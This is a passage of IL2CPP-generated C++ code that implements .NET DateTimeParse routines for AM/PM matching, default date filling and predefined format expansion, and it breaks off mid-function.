System.DateTimeParse::MatchTimeMark(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.DateTimeParse/TM&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchTimeMark_m410D39EB9A0FFAAFD4119D320FE683170625395C (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { String_t* V_0 = NULL; { int32_t* L_0 = ___result2; *((int32_t*)L_0) = (int32_t)(-1); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_1 = ___dtfi1; String_t* L_2 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_1, /*hidden argument*/NULL); int32_t L_3 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_2, /*hidden argument*/NULL); if (L_3) { goto IL_0013; } } { int32_t* L_4 = ___result2; *((int32_t*)L_4) = (int32_t)0; } IL_0013: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_5 = ___dtfi1; String_t* L_6 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_5, /*hidden argument*/NULL); int32_t L_7 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_6, /*hidden argument*/NULL); if (L_7) { goto IL_0023; } } { int32_t* L_8 = ___result2; *((int32_t*)L_8) = (int32_t)1; } IL_0023: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_9 = ___str0; bool L_10 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_9, /*hidden argument*/NULL); if (!L_10) { goto IL_0096; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi1; String_t* L_12 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_11, /*hidden argument*/NULL); V_0 = L_12; String_t* L_13 = V_0; int32_t L_14 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_13, /*hidden argument*/NULL); if ((((int32_t)L_14) <= ((int32_t)0))) { goto IL_005b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_15 = ___str0; String_t* L_16 = V_0; bool L_17 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_15, L_16, /*hidden argument*/NULL); if (!L_17) { goto IL_005b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_18 = ___str0; int32_t* L_19 = L_18->get_address_of_Index_1(); int32_t* L_20 = L_19; int32_t L_21 = *((int32_t*)L_20); String_t* L_22 = V_0; int32_t L_23 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_22, /*hidden argument*/NULL); *((int32_t*)L_20) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_21, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_23, (int32_t)1)))); int32_t* L_24 = ___result2; *((int32_t*)L_24) = (int32_t)0; return (bool)1; } IL_005b: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_25 = ___dtfi1; String_t* L_26 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_25, /*hidden argument*/NULL); V_0 = L_26; String_t* L_27 = V_0; int32_t L_28 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_27, /*hidden argument*/NULL); if ((((int32_t)L_28) <= ((int32_t)0))) { goto IL_008b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_29 = ___str0; String_t* L_30 = V_0; bool L_31 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_29, L_30, /*hidden argument*/NULL); if (!L_31) { goto IL_008b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_32 = ___str0; int32_t* L_33 = L_32->get_address_of_Index_1(); int32_t* L_34 = L_33; int32_t L_35 = *((int32_t*)L_34); String_t* L_36 = V_0; int32_t L_37 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_36, /*hidden argument*/NULL); *((int32_t*)L_34) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_35, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_37, (int32_t)1)))); int32_t* L_38 = ___result2; *((int32_t*)L_38) = (int32_t)1; return (bool)1; } IL_008b: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_39 = ___str0; int32_t* L_40 = L_39->get_address_of_Index_1(); int32_t* L_41 = L_40; int32_t L_42 = *((int32_t*)L_41); *((int32_t*)L_41) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_42, (int32_t)1)); } IL_0096: { int32_t* L_43 = ___result2; int32_t L_44 = *((int32_t*)L_43); if ((((int32_t)L_44) == ((int32_t)(-1)))) { goto IL_009d; } } { return (bool)1; } IL_009d: { return (bool)0; } } // System.Boolean System.DateTimeParse::MatchAbbreviatedTimeMark(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.DateTimeParse/TM&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchAbbreviatedTimeMark_m2839DE1FBBEA99B46C8B84199D361D30AF7294C4 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; bool L_1 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, /*hidden argument*/NULL); if (!L_1) { goto IL_003a; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_2 = ___str0; Il2CppChar L_3 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_2, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi1; String_t* L_5 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_4, /*hidden argument*/NULL); Il2CppChar L_6 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_5, 0, /*hidden argument*/NULL); if ((!(((uint32_t)L_3) == ((uint32_t)L_6)))) { goto IL_0021; } } { int32_t* L_7 = ___result2; *((int32_t*)L_7) = (int32_t)0; return (bool)1; } IL_0021: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_8 = ___str0; Il2CppChar L_9 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_8, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_10 = ___dtfi1; String_t* L_11 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_10, /*hidden argument*/NULL); Il2CppChar L_12 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_11, 0, /*hidden argument*/NULL); if ((!(((uint32_t)L_9) == ((uint32_t)L_12)))) { goto IL_003a; } } { int32_t* L_13 = ___result2; *((int32_t*)L_13) = (int32_t)1; return (bool)1; } IL_003a: { return (bool)0; } } // System.Boolean System.DateTimeParse::CheckNewValue(System.Int32&,System.Int32,System.Char,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988 (int32_t* ___currentValue0, int32_t ___newValue1, Il2CppChar ___patternChar2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t* L_0 = ___currentValue0; int32_t L_1 = *((int32_t*)L_0); if ((!(((uint32_t)L_1) == ((uint32_t)(-1))))) { goto IL_000a; } } { int32_t* L_2 = ___currentValue0; int32_t L_3 = ___newValue1; *((int32_t*)L_2) = (int32_t)L_3; return (bool)1; } IL_000a: { int32_t L_4 = ___newValue1; int32_t* L_5 = ___currentValue0; int32_t L_6 = *((int32_t*)L_5); if ((((int32_t)L_4) == ((int32_t)L_6))) { goto IL_0023; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_7 = ___result3; Il2CppChar L_8 = ___patternChar2; Il2CppChar L_9 = L_8; RuntimeObject * L_10 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_9); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_7, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_10, /*hidden argument*/NULL); return (bool)0; } IL_0023: { return (bool)1; } } // System.DateTime System.DateTimeParse::GetDateTimeNow(System.DateTimeResult&,System.Globalization.DateTimeStyles&) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTimeParse_GetDateTimeNow_mBAF702F1D6A3F954D2520AD7B01FCA0F159DD759 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDateTimeNow_mBAF702F1D6A3F954D2520AD7B01FCA0F159DD759_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_0; memset(&V_0, 0, sizeof(V_0)); { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)2048)))) { goto IL_0049; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; int32_t L_3 = L_2->get_flags_8(); if (!((int32_t)((int32_t)L_3&(int32_t)((int32_t)256)))) { goto IL_003c; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_4 = DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1(/*hidden argument*/NULL); V_0 = L_4; int64_t L_5 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_0), /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_7 = L_6->get_address_of_timeZoneOffset_9(); int64_t L_8 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_7, /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_9; memset(&L_9, 0, sizeof(L_9)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_9), ((int64_t)il2cpp_codegen_add((int64_t)L_5, (int64_t)L_8)), 0, /*hidden argument*/NULL); return L_9; } IL_003c: { int32_t* L_10 = ___styles1; int32_t L_11 = *((int32_t*)L_10); if (!((int32_t)((int32_t)L_11&(int32_t)((int32_t)64)))) { goto IL_0049; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_12 = DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1(/*hidden argument*/NULL); return L_12; } IL_0049: { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_13 = DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2(/*hidden argument*/NULL); return L_13; } } // System.Boolean System.DateTimeParse::CheckDefaultDateTime(System.DateTimeResult&,System.Globalization.Calendar&,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_CheckDefaultDateTime_mE0B8DBAE34A78D6A4E4B7FA6660929CA67EB3478 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** ___cal1, int32_t ___styles2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_CheckDefaultDateTime_mE0B8DBAE34A78D6A4E4B7FA6660929CA67EB3478_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_0; memset(&V_0, 0, sizeof(V_0)); int32_t V_1 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)2048)))) { goto IL_0054; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; int32_t L_3 = L_2->get_Month_1(); if ((!(((uint32_t)L_3) == ((uint32_t)(-1))))) { goto IL_0020; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_4 = ___result0; int32_t L_5 = L_4->get_Day_2(); if ((((int32_t)L_5) == ((int32_t)(-1)))) { goto IL_0054; } } IL_0020: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result0; int32_t L_7 = L_6->get_Year_0(); if ((((int32_t)L_7) == ((int32_t)(-1)))) { goto IL_0037; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_8 = ___result0; int32_t L_9 = L_8->get_flags_8(); if (!((int32_t)((int32_t)L_9&(int32_t)((int32_t)4096)))) { goto IL_0054; } } IL_0037: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_10 = ___result0; int32_t L_11 = L_10->get_flags_8(); if (!((int32_t)((int32_t)L_11&(int32_t)((int32_t)256)))) { goto IL_0054; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_12, 2, _stringLiteralA8AF94D5E162CA900D2AEB9CF3E94BF19D8B6A6E, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0054: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; int32_t L_14 = L_13->get_Year_0(); if ((((int32_t)L_14) == ((int32_t)(-1)))) { goto IL_0072; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result0; int32_t L_16 = L_15->get_Month_1(); if ((((int32_t)L_16) == ((int32_t)(-1)))) { goto IL_0072; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result0; int32_t L_18 = L_17->get_Day_2(); if ((!(((uint32_t)L_18) == ((uint32_t)(-1))))) { goto IL_0130; } } IL_0072: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_19 = ___result0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_20 = DateTimeParse_GetDateTimeNow_mBAF702F1D6A3F954D2520AD7B01FCA0F159DD759((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_19, (int32_t*)(&___styles2), /*hidden argument*/NULL); V_0 = L_20; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result0; int32_t L_22 = L_21->get_Month_1(); if ((!(((uint32_t)L_22) == ((uint32_t)(-1))))) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; int32_t L_24 = L_23->get_Day_2(); if ((!(((uint32_t)L_24) == ((uint32_t)(-1))))) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_25 = ___result0; int32_t L_26 = L_25->get_Year_0(); if ((!(((uint32_t)L_26) == ((uint32_t)(-1))))) { goto IL_00e9; } } { int32_t L_27 = ___styles2; if (!((int32_t)((int32_t)L_27&(int32_t)8))) { goto IL_00bd; } } { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_28 = ___cal1; IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_29 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); *((RuntimeObject **)L_28) = (RuntimeObject *)L_29; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_28, (RuntimeObject *)L_29); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_30 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_31 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result0; int32_t L_33 = 1; V_1 = L_33; L_32->set_Day_2(L_33); int32_t L_34 = V_1; int32_t L_35 = L_34; V_1 = L_35; L_31->set_Month_1(L_35); int32_t L_36 = V_1; L_30->set_Year_0(L_36); goto IL_0130; } IL_00bd: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_37 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_38 = ___cal1; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_39 = *((Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 **)L_38); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_40 = V_0; int32_t L_41 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(18 /* System.Int32 System.Globalization.Calendar::GetYear(System.DateTime) */, L_39, L_40); L_37->set_Year_0(L_41); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_42 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_43 = ___cal1; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_44 = *((Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 **)L_43); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_45 = V_0; int32_t L_46 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(16 /* System.Int32 System.Globalization.Calendar::GetMonth(System.DateTime) */, L_44, L_45); L_42->set_Month_1(L_46); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_47 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_48 = ___cal1; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_49 = *((Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 **)L_48); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_50 = V_0; int32_t L_51 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(11 /* System.Int32 System.Globalization.Calendar::GetDayOfMonth(System.DateTime) */, L_49, L_50); L_47->set_Day_2(L_51); goto IL_0130; } IL_00e9: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_52 = ___result0; L_52->set_Month_1(1); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_53 = ___result0; L_53->set_Day_2(1); goto IL_0130; } IL_00f9: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_54 = ___result0; int32_t L_55 = L_54->get_Year_0(); if ((!(((uint32_t)L_55) == ((uint32_t)(-1))))) { goto IL_0110; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_56 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_57 = ___cal1; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_58 = *((Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 **)L_57); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_59 = V_0; int32_t L_60 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(18 /* System.Int32 System.Globalization.Calendar::GetYear(System.DateTime) */, L_58, L_59); L_56->set_Year_0(L_60); } IL_0110: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_61 = ___result0; int32_t L_62 = L_61->get_Month_1(); if ((!(((uint32_t)L_62) == ((uint32_t)(-1))))) { goto IL_0120; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_63 = ___result0; L_63->set_Month_1(1); } IL_0120: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_64 = ___result0; int32_t L_65 = L_64->get_Day_2(); if ((!(((uint32_t)L_65) == ((uint32_t)(-1))))) { goto IL_0130; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_66 = ___result0; L_66->set_Day_2(1); } IL_0130: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_67 = ___result0; int32_t L_68 = L_67->get_Hour_3(); if ((!(((uint32_t)L_68) == ((uint32_t)(-1))))) { goto IL_0140; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_69 = ___result0; L_69->set_Hour_3(0); } IL_0140: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_70 = ___result0; int32_t L_71 = L_70->get_Minute_4(); if ((!(((uint32_t)L_71) == ((uint32_t)(-1))))) { goto IL_0150; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_72 = ___result0; L_72->set_Minute_4(0); } IL_0150: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_73 = ___result0; int32_t L_74 = L_73->get_Second_5(); if ((!(((uint32_t)L_74) == ((uint32_t)(-1))))) { goto IL_0160; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_75 = ___result0; L_75->set_Second_5(0); } IL_0160: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_76 = ___result0; int32_t L_77 = L_76->get_era_7(); if ((!(((uint32_t)L_77) == ((uint32_t)(-1))))) { goto IL_0170; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_78 = ___result0; L_78->set_era_7(0); } IL_0170: { return (bool)1; } } // System.String System.DateTimeParse::ExpandPredefinedFormat(System.String,System.Globalization.DateTimeFormatInfo&,System.ParsingInfo&,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeParse_ExpandPredefinedFormat_m87CF9E69CC8E52C3D20A55D52FD3DFBBAAC1A44F (String_t* ___format0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** ___dtfi1, ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * ___parseInfo2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ExpandPredefinedFormat_m87CF9E69CC8E52C3D20A55D52FD3DFBBAAC1A44F_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar V_0 = 0x0; { String_t* L_0 = ___format0; Il2CppChar L_1 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, 0, /*hidden argument*/NULL); V_0 = L_1; Il2CppChar L_2 = V_0; if ((!(((uint32_t)L_2) <= ((uint32_t)((int32_t)82))))) { goto IL_001c; } } { Il2CppChar L_3 = V_0; if ((((int32_t)L_3) == ((int32_t)((int32_t)79)))) { goto IL_004e; } } { Il2CppChar L_4 = V_0; if ((((int32_t)L_4) == ((int32_t)((int32_t)82)))) { goto IL_0065; } } { goto IL_0151; } IL_001c: { Il2CppChar L_5 = V_0; if ((((int32_t)L_5) == ((int32_t)((int32_t)85)))) { goto IL_00e4; } } { Il2CppChar L_6 = V_0; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_6, (int32_t)((int32_t)111)))) { case 0: { goto IL_004e; } case 1: { goto IL_0151; } case 2: { goto IL_0151; } case 3: { goto IL_0065; } case 4: { goto IL_009c; } case 5: { goto IL_0151; } case 6: { goto IL_00b3; } } } { goto IL_0151; } IL_004e: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_7 = ___parseInfo2; IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_8 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); L_7->set_calendar_0(L_8); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_9 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_10 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_9) = (RuntimeObject *)L_10; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_9, (RuntimeObject *)L_10); goto IL_0151; } IL_0065: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_11 = ___parseInfo2; IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_12 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); L_11->set_calendar_0(L_12); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_13 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_14 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_13) = (RuntimeObject *)L_14; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_13, (RuntimeObject *)L_14); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result3; int32_t L_16 = L_15->get_flags_8(); if (!((int32_t)((int32_t)L_16&(int32_t)((int32_t)2048)))) { goto IL_0151; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result3; int32_t* L_18 = L_17->get_address_of_flags_8(); int32_t* L_19 = L_18; int32_t L_20 = *((int32_t*)L_19); *((int32_t*)L_19) = (int32_t)((int32_t)((int32_t)L_20|(int32_t)((int32_t)8192))); goto IL_0151; } IL_009c: { 